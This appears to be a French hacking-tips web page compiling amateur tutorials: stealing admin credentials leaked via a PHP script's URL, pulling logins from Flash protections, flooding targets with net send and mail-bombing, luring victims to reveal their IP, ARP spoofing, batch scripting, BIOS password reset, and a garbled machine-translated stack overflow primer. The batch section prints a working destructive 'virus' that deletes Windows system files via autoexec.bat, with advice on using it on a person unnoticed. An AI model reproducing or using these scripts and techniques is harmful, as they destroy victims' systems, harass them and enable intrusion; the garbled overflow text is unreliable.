http://selfhtml.selfhtml.com.fr/cgiperl/introduction/traitementformulaire.htm

Reprenons:

L'affichage de votre variable $REFERER est de cette forme :

http://www.google.com/search?q=moteur recherche email&hl=fr&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N

Nous remarquons la variable "q" nous donne les mots clefs... Mais beaucoup de script PHP vous permet de vérifier un site ( par exemple soumis dans un annuaire généraliste lamba ) via l'interface d'admin.

C'est le cas de PDS qui propose un lien avant d'accepter un nouveau site dans le partenariat. Cependant le développeur de ce script fait passer le mot de passe et le login à travers URL.

Donc la variable $REFERER prend la valeur du type : http://www.victim.com/pds/index.php?login=admin&mdp=234223

Donc au moment où vous cliquez pour vérifier la qualité d'un site, le $REFERER contient cette URL qui avec un simple copier collée vous permet d'accepter sur l'espace d'administration de la personne.

Encore plus grave: dans ce même script, PDS prévoit une page dans lesquelles vous rentrez vos paramètres SQL avec le mot de passe en claire !

Il y a donc tout ce qu'il faut pour une intrusion dans la base de données dans laquelle se trouve souvent les informations très intéressantes...

Le mot de passe SQL est souvent le même que le mot de passe FTP donc inutile de vous dire l'énormité de cette faille...

Voilà : Attention à vos scripts Wink

Clin d’œil sur le site http://www.webdiz.com/scriptsphp/pdsban.php qui propose PDS avec la phrase : « avec un interphase très evoluer »

Le site http://plus2trafic.membres.jexiste.org/pds-ban/ qui à tester ce script à laisser tout sans l’utiliser ! grosse erreur !!!!

Infos sur PDS sur http://plus2trafic.membres.jexiste.org/pds-ban/Lisez-moi.html

Salutation...

Protection flash

Comment passer les protections flash

Pour cela vous avez besoin:
- Une protection flash (logique)
- Le logiciel Sothink SWF Decompileur.
- Mon tuto
- Un cerveau (et encore, c'est facultatif)
Recette:
Une fois que vous étes dans la page où se trouve la protection flash, allez chercher dans le code source de la page, l'URL correspondant à cette protection, elle est de la forme: machintruc.swf
Une fois cela fait, chargez la page puis faites enregistrer sous !
Maintenant ouvrez le fichier ainsi sauvegardé avec le logiciel Sothink SWF Decompileur.
Cochez la case Source Code (dans View puis ActionScript).
A partir de là il ne vous reste plus qu'à explorer les sous dossiers de la protection flash (ça se trouve sur la droite). Le login et le pass se trouvent dans le code source (dans le sous dossier action).
C'est aussi simple que ça.

Netsend

Faire planter un ordi avec Netsend

En déconnant avec Snurf, alors qu'on s'envoyait des messages avec NetSend (voir l'article net send, toujours dans la rubrique hacking); je me suis dit si c'était pas possible d'automatiser l'envoi de message, de les envoyer en nombre et pourquoi pas, faire planter l'ordi!!! Oui, je viens d'inventer la technique pour envoyer automatiquement des messages. REDOUTABLE!!!

Vous avez bien lu et la technique, toute conne, est en exclusivité sur projectnews (mais pour combien de temps avec tous les copiers colleur et les pompeurs d'idées qui courent sur le net!!!).

Voici la technique pas à pas, je précise qu'il faut win2000 ou XP pour que ça marche, de même pour l'ordinateur cible!

On va créer un petit programme en .bat tout con qui se chargera d'expédier les message dès que vous cliquerez dessus. Voici la procédure:

1)Ouvrer le bloc note

2)Tapez la ligne suivante:

net send 81.52.234.58 salut tout le monde!!!

(mettez l'ip de l'ordinateur a attaqué a la place de 81.52.234.58 et le message que vous voulez a la place de salut tout le monde!!! )

3) sautez une ligne et mettez la même phrase en faisant copier coller

mettez autant de phrase que de message a envoyer

4) maitenant va falloir enregistrer votre chef d'oeuvre,

-allez dans enregistrer sous

-choisissez type de fichier-tous les fichiers

-nom du fichier send.bat

Voilà c'était pas bien compliqué et c'est rudement efficace.

Netsend 2

Net send, ou comment bien se marrer avec l'ip de quelqu'un

Net send, c'est une commande très vieille que les publicitaires ont récupérés pour vous envoyer des message. Cependant, en connaissant l'ip de quelqu'un (voir les autres articles sur ce sujet sur projectnews)
vous pouvez vous aussi lui envoyer des messages d'alertes windows. Sympa non? Voici comment faire:
Compatible uniquement avec windows 2000 et Xp

1)aller dans démarer, accessoire et choisissez invite de commande
2)tapez ipconfig sous xp ou winipcfg sous les autres windows pour connaitre votre ip.
3)une fois que vous la connaissez, tapez "net send 127.0.0.1 ici le message"
Remplacez bien sur 127.0.0.1 par votre ip. Vous verrez ensuite apparaitre un message sur votre ordi.
Pour envoyez un message a une connaissance, mettez l'ip de la personne, elle recevra votre message,
a condition qu'elle n'est pas de pare feu. En effet, les pare feu bloque ces messages. Donc quand
vous vous envoyez un message a vous même, n'oubliez pas de l'éteindre.

Voici le screenshot de la méthode:

Mail bonbing

Mail-bombing
Le mail-bombing est une technique toute conne qui sert à faire chier le monde. C'est ce que les jeunes hacker font en premier. Il s'agit d'un logiciel qui envoie des milliers de messages pour faire planter la boite.( En général 5000 suffit). On utilise pour cela des logiciels qui se chargeront d'effectuer les opérations demander.

Commencer par télécharger le logiciels et installer-le ( j'en propose dans la rubrique téléchargement). Si votre antivirus s'excite, c'est normal, ça veut dire qu'il marche bien. Ils sont conçu pour detecter ce genre de programme. Rassurez-vous c'est sans danger.

Entrer l'adresse de votre corespondant, écrivez un message, choisissez le nombre de message à envoyer, entrer le nom d'un serveur qui se chargera d'acheminer le courrier( par exemple smtp.free.fr) et envoyer la sauce!!!.

Qu'est-ce que c'est ?

Le Mail Bonbing constite à envoyer un nombre faramineux d'emails (plusieurs milliers par exemple) à un ou des destinataires. L'objectif étant de :

-saturer le serveur de mails
_saturer la bande passante du serveur et du ou des destinataires, rendre impossible aux destinataires de continuer à utiliser l'adresse électronique.

Conclusion

Le mail bombing n'est, à priori, pas illégal. Il n'existe pas de limite légale déterminant le nombre maximum de messages à envoyer à un internaute. Cependant, les fournisseurs d'accès à Internet n'apprécient pas ce type de procédés. En effet, cela leur cause des soucis de bande passante et la saturation de leurs serveurs de messagerie. En conséquence, n'hésitez surtout pas à les solliciter si vous êtes victime d'une telle attaque. Ils réagissent généralement rapidement pour éviter que leurs abonnés recommencent.

Adresse ip 2

Adresse ip: 2 autres techniques pour en choper une

Les adresse ip , nuxly et les autres on en dejà beaucoup parlait sur le site , certaines technique pour avoir l'ip sont donc dejà a voir mais moi j'en ais une autre !

Ma "technique" c'est en faite un logiciel ...

Le nom de ce programmes : serv-U , c'est un serveur ftp qui se sert de votre pc comme d'un passerelle ftp , mais vous ne l'utiliserais que comme vous le voulez ... ne laisser pas tous les hackeur du web se connecter dessus mais en principe y'a pas trop de danger ... Bon j'arrete de divaguer ... Alors vous telecharger serv-u ! Je ne connais plus l'url et c'est une seule de toutes les version serv'u qu'il faut ! je crois que c'est la 5.0.1 .... pas d'autre informaton sauf que ce serv-u la a une forme rectangulaire et ne vous demande aucune information precise !! ( si vous le trouver donner l'url sur un forum svp ). Bon revenons !!! Vous lancer serv-u et vous aller parler a la cible .. vous lui envoyer un mail .. lui dites des choses cochonne sur MSN ... je m'en fou mais vous lui envoyer un lien avec l'url : ftp://votreipici , surtout n'oubliern pas de mettre votre ip !! Pour ceux qui ne savent pas faire un lien ...Chercher nan je lol !! clique droit : hyperlien en principe !!! Bon ensuite vous aller dans serv-u et si la personne clique effetivement sur le lien , dans serv-u cela s'affichera ! vous verrer son serveur ( wanadoo , aol ... ) ainsi que son ip !!! Pas copliquer non ? EN RESUMER : pour ce qu'il ne veulent pas tout lire vous telecharger serv-U 5.0.1 ou 5.1.0 .... fin un serv-u de forme rectangulaire ! vous envoyer un lien a votre victime avec l'url : ftp://votreipavous et vous verrer apparaitre son ip dans serv-u a condition que la victime clique sur le lien !! PS: attention ne vous attaquer pas a des boss ou quoi parce ke quand la victime cliquera sur le lien , dans la barre d'url elle vera votre ip , quelqu'un de naif se demandera : " quoi? une page blanche?" mai un hackeur sera quoi faire de ces numeros !!! FIN DU ROMANS

On peut faire la même chose avec zone alarm, on met son ip, le pigeon clique dessus, il essaye de se conecter a ta bécanne mais zone alarm s'exite et affiche l'ip de celui qui veut s'introduire dans le pc. Voilà, c'est tout con et je pense que c'est un peu plus simple que l'autre technique, cependant serv-u est un excellent logiciel si vous voulez créer un serveur sur votre PC.

Arp redirect

Les attaques: l'arp redirect

Les attaques : L’arp redirect

L'attaque ARP redirect vise les réseaux locaux ethernet, qu'ils soient partitionnés ou non en sous-réseaux (switchés). C'est une technique de spoofing efficace bien que détectable dans les logs d'administration;

elle consiste à s'attribuer l'adresse IP de la machine cible, c'est-à-dire à faire correspondre son adresse IP à l'adresse MAC de la machine pirate dans les tables ARP des machines du réseau. Pour cela il suffit en fait d'envoyer régulièrement des paquets ARP_reply en broadcast, contenant l'adresse IP cible et la fausse adresse MAC. Cela a pour effet de modifier les tables dynamiques de toutes les machines du réseau. Celles-ci enverront donc leur trames ethernet à la machine pirate tout en croyant communiquer avec la cible, et ce de façon transparente pour les switches. De son côté, la machine pirate stocke le traffic et le renvoie à la vraie machine en forgeant des trames ethernet comportant la vraie adresse MAC (indépendamment de l'adresse IP).
Cette technique est très puissante puisqu'elle opère au niveau ethernet, permettant ainsi de spoofer le trafic IP et même TCP (cela dépend entre autres des délais engendrés par la machine pirate). D'autre part, elle permet de contourner les barrières que constituent habituellement les switches (partitionnement de réseaux).

Quel outil : http://www.arp-sk.org/

A besoin de wincap pour fonctionner http://winpcap.polito.it/install/default.htm

Batch

Tutorial sur les .batch (.bat)

Bonjour, dans ce tutorial je présenterais le batch et des exemples de code en batch, à la fin se trouve des liens avec un compilateur et des cours, bonne lecture.

 

Table des matières

1: Initiation et explication du batch, et liste de différentes commandes

2: Initiation à la boucle IF

3: Code viral en batch

3: Graphisme en batch

5: Divers liens

1: Explication, initiations, et liste des commandes

Le batch fonctionne uniquement sous Windows (toutes versions) mais nous noterons tout de même qu'il y a des fonctions comme les couleurs, propres aux systèmes à base NT (donc NT, XP et 2000)

Déjà il faut dire que le batch n’est rien de plus qu’une série de commandes Ms-Dos, donc toutes les commandes Ms-Dos que vous connaissez peuvent être utilisées, nous noterons également, qu'il y a des commandes propres au .batch (hors commandes Ms-Dos) près enregistrées dans un fichier, qui des que vous ouvrirais le fichier, seront exécutées une à une.

On peut également, faire des boucles, mais très basiques (c'est pas du C/C quand même hein ! ;) genre, if, for... qui seront abordées dans ce cour

Pour faire un .bat écrivez votre texte dans le bloc note puis sauvez avec l'extension .bat ou .batch ou utilisez un compilo (comme Power Batch).

Commençons par une notion simple, l’echo.

L’echo peut servir à plusieurs trucs, comme:

Echo « texte » affiche du texte

Echo off affiche que les résultats des commandes MS-Dos et non les commandes elles même

@echo off pareil que echo off sauf que la commande echo off est caché elle-même car dans le batch, les commandes sont lut puis une fois lut, exécuter (donc echo off sera affiché avant d’être exécuté, donc ne se cachera pas lui-même) donc un simple echo off cachera toutes les commandes sauf lui alors qu’avez le signe @ il se cachera lui-même.

Echo. Affiche une ligne vide (saute une ligne)

Voilà pour l’echo, nous passons à une notion un peu plus compliquée (même si le batch est très simple il y a forcement des choses plus durs que d’autres ;)

Pour mettre de la couleur dans votre batch, (uniquement Windows NT ) il va falloir mettre une « choses » qui vérifie si l’OS est à base NT et exécute ensuite la commande qui change la couleur de fond et des textes dans la fenêtre MS-Dos.

Voici cet IF:

if not "%os%" =="Windows_NT" goto OSerr

color 0A

Le if not "%os%" =="Windows_NT" goto OSerr testera si l’os est NT, et le color 0A veut dire mettre le fond de la fenêtre en noir et les écritures en vert, explication:

La première valeur définit la couleur de fond du MS-Dos, ici 0 = noir

La deuxième valeur définit la couleur du texte, ici A = vert

Liste avec quelques couleurs : 0 = noir 1 = bleu foncé 2 = vert 3 = bleu gris 4 = marron etc…

Pour rejoindre un répertoire, rien de plus simple tapez le légendaire:

cd C: om du répertoire

Imaginez que vous voulez créer un répertoire dans C:program files

(Sachant que la commande pour créer un répertoire est mkdir)

Vous taperez:

cd C:Program files

mkdir nom-du-répertoire

Ensuite libre cour à votre imagination le batch n’est jamais qu’une série

de commandes Ms-Dos près enregistré dans un fichier, donc vous pouvez mettre un ipconfig et double cliquer pour voir votre ip…

Pour que votre batch ne se ferme pas instantanément il va falloir mettre un truc, mais quoi ? Tout simplement pause à la fin de votre code, le programme attendra ensuite que vous appuyez sur une touche pour se fermer.

Puis voici la liste avec quelques commandes Ms-Dos (par m@ster@ck)

del fichier : cette commande permet de supprimer un fichier.

deltree fichier : supprime un dossier complet.

move fichier : déplace le fichier "fichier".

echo off : désactive l'affichage de ce qui ce passe.

dir c:WINDOWS : affiche le contenu de c:windows.

echo. : saute une ligne.

echo ce que tu veux écrire : écrit ce que vous tapez après echo (dans notre cas il y aura écrit "ce que tu veux écrire").

CLS : efface l'écran.

PAUSE : demande d'appuyer sur une touche pour continuer

C:WINDOWS ON_PROG.EXE: exécute ton_prog.exe

AT: Planifie l'exécution de commande ou programmes sur l'ordinateur

ATTRIB: Affiche ou modifie les attributs d'un fichier

BREAK : Active ou désactive le contrôle étendu de CTRL C

CALLS: Affiche ou modifie les listes de contrôles d'accès aux fichiers.

CALL: appelle un fichier de commande depuis un autre fichier de commande

CD: Modifie le répertoire ou affiche le répertoire en cours

CHCP: Modifie la page de code active ou affiche son numéro.

CHDIR: Modifie le répertoire ou affiche le nom du répertoire en cours

CHKDSK: Vérifie un disque et affiche un relevé d'état

CHKNTFS: Affiche ou modifie la vérification du disque au démarrage

CMD : Lance une nouvelle instance de l'interprétateur de commande de Windows

COLOR: Modifie les couleurs du premier plan et de l'arrière plan de la console

COMP : Compare les contenus de deux fichiers ou groupe de fichiers

COMPACT : Modifie ou affiche la compression des fichiers sur une partition NTFS

CONVERT : Convertit des volumes FAT en volumes NTFS. Vous ne pouvez pas convertir le lecteur en cours d'utilisation.

COPY : Copie un ou plusieurs fichiers.

DATE : Affiche ou modifie la date.

DIR : Liste des fichiers

DISKOMP: Compare les contenus de deux disquettes

DISKCOPY : Copie le contenus d'une disquette sur une autre

ENDLOCAL : Stoppe la localisation des modifications de l'environnement dans un fichier de commandes

ERASE : Supprime un ou plusieurs fichiers.

EXIT : Quitte l'interprétateur de commandes .

FC : Compare deux fichiers ou groupe de fichiers ;et affiche les différences entre eux .

FIND : Cherche une chaîne de caractères dans un ou plusieurs fichiers

FINDSTR : Cherche des chaînes de caractères dans un ou plusieurs fichiers

FOR : Exécute une commande sur chaque fichier d'un groupe de fichiers

FORMAT : Formate un disque pour utilisation avec Windows

FTYPE : Affiche ou modifie les types de fichiers utilisés dans les associations d’extensions

GOTO : Poursuit l'exécution d'un fichier de commandes à une ligne identifiée par une étiquette

GRAFTABL : Permet à Windows d'afficher un jeu de caractères en mode graphique

HELP : Affiche des informations sur les commandes de Windows

IF : Effectue un traitement conditionnel dans un fichier de commande

LABEL : Crée, modifié ou supprime le nom de volume d'un disque

MD : Crée un répertoire

MODE : Configure un périphérique du système

MORE : Affiche la sortie écran par écran

MOVE : Déplace un ou plusieurs fichiers d'un répertoire à un autre

PATH : Affiche ou définit le chemin de recherche des fichiers exécutables

POPD : Restaure la valeur précédente du répertoire courant enregistré par PUSHD

PRINT : Imprime un fichier texte

PROMPT : Modifie l'invite de commande de Windows

PUSHD : Enregistre le répertoire courant puis le modifie

RD : Supprime un répertoire

RECOVER : Récupère l'information lisible d'un disque défectueux

REM : Insère un commentaire dans un fichier de commandes ou CONFIG.SYS.

REN : Renomme un ou plusieurs fichiers

SET : Affiche, définit ou supprime des variables d'environnement Windows

SETLOCAL : Commence la localisation des changements de l'environnement dans un fichier de commandes

SHIFT : Modifie la position des paramètres remplaçables dans un fichier de commandes

SORT : Trie les éléments en entrée

SUBST : Affecte une lettre de lecteur à un chemin d'accès

Et nous finissons par un exemple de code en batch, bonne fin de lecture..

Pour compiler le programme suivant, mettez le dans le bloc note et sauvez le avec une extension .bat ou alors dans Power batch.

Code pour Win XP:

@Echo OFF

TITLE Bienvenue sur Connexions Power...

if not "%os%" =="Windows_NT" goto OSerr

color 0A

ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»

ECHO º Connexions Power º Donne votre IP et liste les connexions de votre PC

ECHO ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

ECHO.

ECHO.

ipconfig

ECHO.

ECHO ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ECHO.

netstat

ECHO.

ECHO ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ECHO.

ECHO Connexions Power garde des fichiers log des activités‚es et de vos Ips

ECHO C:Program FilesConnexions-Power.

ECHO.

cd C:Program Files

mkdir Connexions-Power

cd C:Program FilesConnexions-Power

ipconfig >> Ips.txt

netstat >> Connexions.txt

PAUSE

Alors, maintenant, on va commenter ce code ;)

C’est un batch qui, des que vous cliquerais dessus, vous donnera votre IP et vous montrera les connexions de votre PC (j’ai pris cet exemple car je me sers souvent de ces commandes)

TITLE donne un titre à la fenêtre Ms-Dos (en haut à gauche)

@ECHO off

Veut dire: cacher tout le texte (les commandes entrées etc… et n’afficher que le résultat) le Echo off cache tout, sauf lui-même et le @ cache Echo off (vous comprenez ?)

if not "%os%" =="Windows_NT" goto Oserr

color 0A

Veut dire, que si l’OS est à base NT, le fond de la fenêtre ms-dos, sera noir et les écritures, vertes.

ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»

ECHO º Connexions Power º Donne votre IP et liste les connexions de votre PC

ECHO ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Affiche un cadre autour de Connexions Power et marque « Donne votre IP et liste les connexions de votre PC » à droite du cadre.

ECHO.

Veut dire, sauter une ligne

Ensuite, ipconfig et affiche votre IP et netstat affiche vos connexions.

cd C:Program Files

mkdir Connexions-Power

cd C:Program FilesConnexions-Power

Veut dire: aller dans le répertoire program files, créer un fichier Connexions Power, puis allez dans ce dossier et attendre les instructions.

ipconfig >> Ips.txt

netstat >> Connexions.txt

Veut dire, à chaque ouverture, loguer les instructions affichées par ces deux commandes les mettre dans un .txt et mettre ce .txt dans le dossier Power-Connexions que l’on vient de créer.

Pause

Veut dire attendre que l’utilisateur tape sur une touche et quitter le programme.

Voilà, j’espère que ce petit code commenté vous aura servit et vous aura apprit quelques choses, j’attends vos commentaires

2: Initiation à la boucle IF

Dans cette partie, je vais essayer de vous faire une petite initiation au boucle IF et FOR dans les batch (j’estime qu’il n’y a plus besoin de code source, pour vous faire des exemples, si vous avez lut la première partie vous avez un minimum d’autonomie)

IF

Cette commande sert à une chose bien utile: si une condition est remplie (comme par exemple, imaginons le programme de la section précédente, nous allons dire que si votre IP est celle si: 212.35.25.48 il se produira une chose, si elle n’est pas celle ci, l’instruction sensée s’exécuter ne s’exécute pas (bien sur, mon exemple est un mauvais exemple car il ne sert à rien dans un programme d’exécute un programme si votre IP est celle ci, quoi que si vous avez une IP et si vous voulez voir si elle a changé ;)

Voici sa syntaxe: If « condition » == « valeur » action

Nous allons prendre comme exemple encore mon code précédent:

if not "%os%" =="Windows_NT" goto OSerr

color 0A

Vous voyez que si l’OS est à base NT, la commande color 0A sera exécutées, on la passe, voilà c’est aussi simple que ça ;)

3: Code viral en batch

Exemple commenté d’un virus en .bat :

@echo off //désactive l’affichage à l’ecran
del c :windows*.dll
// del des DLLs
del c :windowssystem*.dll
//del des DLLs
del c :windows*.exe
//del des EXEs
del c :windows*.ini
//del INI
del c :windows*.sys
//destruction des fichiers vitaux
echo @echo off>>c :autoexec.bat
//écriture dans autoexec
del c :windows*.dll>>c :autoexec.bat //del des DLLs en cour d'utilisation (et donc protégées, il faut les enlevées au démarrage)
del c :windowssystem*.dll>>c :autoexec.bat
//destruction des fichiers protégés au démarrage
del c:windowsexplorer.exe>>c :autoexec.bat
//del de l'explorer

Astuce : Pour les virus nécessitant un redémarrage de la machine pour une destruction totale, rajoutez la commande C:WINDOWSRUNDLL32.EXE user.exe,exitwindows à la fin pour l’arrêt de la machine.
/
! Attention ! Avant d’utiliser un batch sur une personne, il est conseillé de faire un repérage pour identifier le système. Imaginez que le répertoire du gars s’appelle « windows01 », le virus ne pourra pas y accéder, et là : message d ‘erreur et vous êtes démasqué ! Ces virus ne marche que sous windows ! Des petites astuces existent : remplacer windows par %systemdir%

(J'ai récupéré ce tuto il n'est pas de moi, mais je l'ai trouvé bien (il se sert de autoexec etc... pour infos, son auteur était Shad0w)

3: Graphisme en batch

Vous allez rire, vous allez me dire qu’une fenêtre Ms-Dos ont ne peut pas lui rajouter des graphismes….

Ok, ce ne sera pas une interface graphique, mais des couleurs, des encadrement, et tout ce qui va avec ;)

Sachez que les couleurs sont disponibles uniquement sous Windows NT, XP et 2000.

Il vous faudra rentrer une instruction IF vu précédemment, là voici:

if not "%os%" =="Windows_NT" goto OSerr

color 0A

Mettez cette commande tout au début de votre batch, car vu que les commandes sont exécutées une à une, si vous la mettez à la fin, la fenêtre ne sera pas coloré des qu’elle sera ouverte (testez pour voir)

Si vous copiez cette commande, le fond sera en noir et les couleurs, en vert, vu que j’ai déjà parlé un peu parler du graphisme en chapitre 1, je vais donner ici uniquement une liste des différentes couleurs:

0 = Noir

1 = Bleu foncé

2 = Vert

3 = Bleu gris

4 = Marron

5 = Pourpre

6 = Kaki

7 = Gris clair

8 = Gris

9 = Bleu clair

A = vert clair

B = Cyan

C = Rouge

D = Rose

E = Jaune

F = blanc

Voilà pour cette liste, on passe maintenant aux encadrements j’ai promis en début de de tuto, que j’en reparlerais ;)

On peut encadrer son texte dans un batch, il faut pour cela afficher du texte (donc echo) et rentrer une série de caractères spéciaux interprétés par Ms-Dos comme des bordures regardez :

ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»

ECHO º Connexions Power º

ECHO ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

En regardant bien on en déduit qu’une bordure horizontale n’est qu’une série de Í, je vais détailler ici quel symbole symbolise quelle bordures:

Í = bordure horizontale

º = bordure verticale

É = coin supérieur gauche

È = coin inférieur gauche

» = coin supérieur droit

¼ = coin inférieur droit

En ayant cette légende et en testant (et en vous rapportant au batch de début de tuto) les bordures paraissent et sont simples ;)

Liens

Voici la section des liens, il y a des liens pour télécharger des compilo et d'autres pour des tuto sur le batch beaucoup plus complexe et complet que le mien (je vous suggère de lire ces 90 pages de tuto, si vous avez amé le mien, car le mien n'était fait que pour avoir une ou deux notions)

www.astase.com (site de programmation)

www.astase.com/products/powerbatch/toolkit.htm (power batch version pro)

www.astase.com/products/powerbatch/powerbatch.htm (l'outils que j'utilise)

www.astase.com/products/powerbatch/powerbatchdos.htm (la version allégées de powerbatch)

www.astase.com/products/powerbatch/tutorielbatch.htm (le fameux tuto que je vous conseil de lire, j'ai tout appris dedans)

Bios

Réinitialisé le mot de passe du bios

Il vous suffit d'enlever la pile de la carte mère, de démarrer l'ordinateur, et de la remettre.

En effet, toutes les données qui ont été configurées dans le Bios sont mémorisées dans la mémoire, qui a besoin d'énergie pour conserver les données.

Par le simple fait d'enlever la pile de la carte mère et de démarrer l'ordinateur (la pile est sur la carte mère, dans l'ordinateur, c'est généralement la carte la plus grosse et la pile est ronde et plate, placée sur la carte), cela efface toute la configuration, donc le mot de passe.

Le Bios aura la configuration par défaut mais vous aurez toujours vos données windows (donc rien de grave, car la plupart des bios ne sont jamais configurés par l'utilisateur...). 

Bordement

 Analyse et exploitation des débordement de pile

Stack Overflows Analysis & Exploiting Ways

Dans le passage qui suit, Vous allez comprendre le STACK overflows, cela sert à apprendre comment le processeur travail pendant l’exécution du programme. Quand un programme est exécuté ses éléments sont assignés dans la mémoire d'une manière bien organisée comme le montre la figure. Des variables locales, les arguments de fonction et pleins d'autres choses, sont assignés EN PILE. Les variables assignées automatiques restent à la place dans le TAS. Des secteurs de BSS et de DATA sont consacrés aux variables locales et sont assignés pendant le temps de compilation

Pour être clair : les BSS de est secteur inclut par l’initialisation des données, alors que le DATA est réservé pour des données statiques (e.g. ‘static’ dans le langage C). Le secteur de TEXT est le secteur de données comprenant les instructions, telles que le code du programme qui est exécuté où il n'est  possible de ne réaliser d' opération d'écriture mais seulement de lecture.

Figure 1


______________________
| env strings | high adresses
|_____________________|
| argv strings |
|_____________________|
| env pointers |
|_____________________|
| argv pointers |
|_____________________|
| arcg |
|_____________________|
| stack |
| || |
| / |
| |
| / |
| || |
| heap |
|_____________________|
| .bss |
|_____________________|
| .data |
|_____________________|
| .text |
|_____________________| low address

Stack & SimpleSem

Une manière très bonne de comprendre ce qui se produit dans la PILE pendant n'importe quelle exécution du programme est SIMPLESEM qui est une machine virtuelle où il est possible d'exécuter un certain code dans le modèle abstrait.

La PILE est une zone de mémoire où sont assignés les arguments de toutes les fonctions, les variables locales et beaucoup d'information pour récupérer l'état de mémoire avant que la fonction se soit appelée. Elle est organisée selon les règles du LIFO (dernier dedans, d'abord dehors) et se développe vers le bas.

Analysons un programme C qui appelle quelques fonctions :

#include

void first();
void second();

main(int argc, char *argv[])
{
char a[10];
first();
}
void first()
{
char b[10];
second();
}
void second()
{
char c[10];
}

De cette façon toutes les variables vont être assignées EN PILE.

Étudions la situation démontant le code binaire : disas (de gdb) principaux

Dump of assembler code for function main:
0x80482f4 : push ëp
0x80482f5 : mov %esp,ëp
0x80482f7 : sub !N_texte!x18,%esp
0x80482fa : and !N_texte!xfffffff0,%esp
0x80482fd : mov !N_texte!x0,êx
0x8048302 : sub êx,%esp
0x8048304 : call 0x804830c
0x8048309 : leave
0x804830a : ret
0x804830b : nop

(gdb) disas first
Dump of assembler code for function first:
0x804830c : push ëp
0x804830d : mov %esp,ëp
0x804830f : sub !N_texte!x18,%esp
0x8048312 : call 0x804831a
0x8048317 : leave
0x8048318 : ret
0x8048319 : nop

(gdb) disas second
Dump of assembler code for function second:
0x804831a : push ëp
0x804831b : mov %esp,ëp
0x804831d : sub !N_texte!x18,%esp
0x8048320 : leave
0x8048321 : ret
0x8048322 : nop
0x8048323 : nop

Regardant les instructions assembleur ci-dessus il est possible de noter comment l'appel de la routine est réalisé et son prolog relatif trop ("prolog de procédé"), comme il suit :

• 0x804830c : push ëp (mis l'adresse de base dans la pile)

• 0x804830d : mov %esp,ëp (l'indicateur de pile courant devient la nouvelle adresse de base)

• 0x804830f : sub !N_texte!x18,%esp (assignant l'espace pour la variable) (afin de comprendre tous les concepts il est important une connaissance mineure d'assembleur).

Il est fondamental pour maintenir la discussion aussi facile que possible, ainsi nous pouvons négliger tous les calculs de "redundants" de la machine (indispensable laissez-la fonctionnant bien) et présenter SIMPLESEM. Dans la table suivante a été inséré le secteur de données du SIMPLESEM pendant l'exécution du programme C de précédent.


SIMPLESEM
CURRENT # 0
FREE # 1
Return Pointer # 2
Dynamic Link # 3
A[10] in main() 4
Return Pointer # 5
Dynamic Link 2 6
B[10] in first() 7
Return Pointer # 8
Dynamic Link 5 9
C[10] in second() 10

Les indicateurs COURANTS (indiquant l'adresse de base courante) et LIBREMENT (indiquant la première cellule libre) sont nécessaires laissent le travail à la machine mais pas aussi important pour comprendre comment l'appel d'une routine fonctionne, alors nous peuvent les omettre. Il est possible de soustraire l'appel de la routine s'insérant simplement dans le secteur de données :

• Return Pointer
• Dynamic Link

Quand la routine reviendra aux visiteurs l'indicateur d'Istruction (IP) se dirigera, dans le secteur de données, au prochain istruction.

Le maintenir en fait facile mais aussi vrai comme possible nous pouvons placer près du secteur de données du SIMPLESEM le vrai processeur un. Il est vraiment important de maintenir dans l'esprit qu'EN PARTICULIER le registre dirigera toujours au dessus de la pile, il peut increase/decrease par push/pop ; le lien dynamique de la routine appelée contient la valeur des adresses de base de visiteur (Regard à la table ci-dessus). L'indicateur de retour, ou l'adresse de retour, est poussé en temps-d'exécution dans la pile quand la fonction `CALL' est appelée.

SIMPLESEM X86
CURRENT #
FREE #
Return Pointer #
Dynamic Link

:push ëp
A[10] in main() sub !N_texte!x18,%esp
Return Pointer #
:call 0x804830c
Dynamic Link :push ëp
B[10] in first() :sub !N_texte!x18,%esp
Return Pointer # :call 0x804831a
Dynamic Link : push ëp
C[10] in second() : sub !N_texte!x18,%esp


Overflow

En conclusion, après cette discussion, nous pouvons faire face au

"DÉBORDEMENT"(OVERFLOW) que notre problème est pour comprendre ce qui se produit dans la PILE quand un débordement se produit. Nous pourrions noter que quand nous déclarons une variable, son espace relatif est

assigné EN PILE :

A[10] in main() sub !N_texte!x18,%esp

Le débordement se produit quand nous allons au-dessus de la limite supérieure réservée pour la variable en pile. Par le débordement de pile il est possible de recouvrir le lien dynamique (EBP) et l'indicateur de retour trop (EIP) changeant le temps d'exécution la prochaine instruction d'être exécuté quand la routine revient.

Le programme suivant montre la vulnérabilité.

//VULNERABLE.C
#include

main(int argc, char *argv[])
{
char a[100];
strcpy(a, argv[1]);
}

Nous pouvons passer comme argv[1 ] n'importe quelle chaine plus longtemps que 100 chars.

Commencer le programme : Perl vulnérable de ` - le programme de

x128'` du l''impression "A" de e a reçu le signal SIGSEGV, défaut de

segmentation.

(gdb) 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb) info reg ebp
ebp 0x41414141 0x41414141

Comme vous pouvez voir l'ee pourrait recouvrir EBP et EIP qui se dirigent maintenant au ` 0x41414141'(hexadécimal codez du ` A de lettre 'causant le défaut de segmentation. Maintenant nous pouvons exécuter n'importe quelle instruction souhaitée, un fait qu'elle est assez pour ajouter le shellcode dans le programme qui lance le « vulnérable » et a laissé l'indicateur d'Istruction se diriger à son

premier byte.

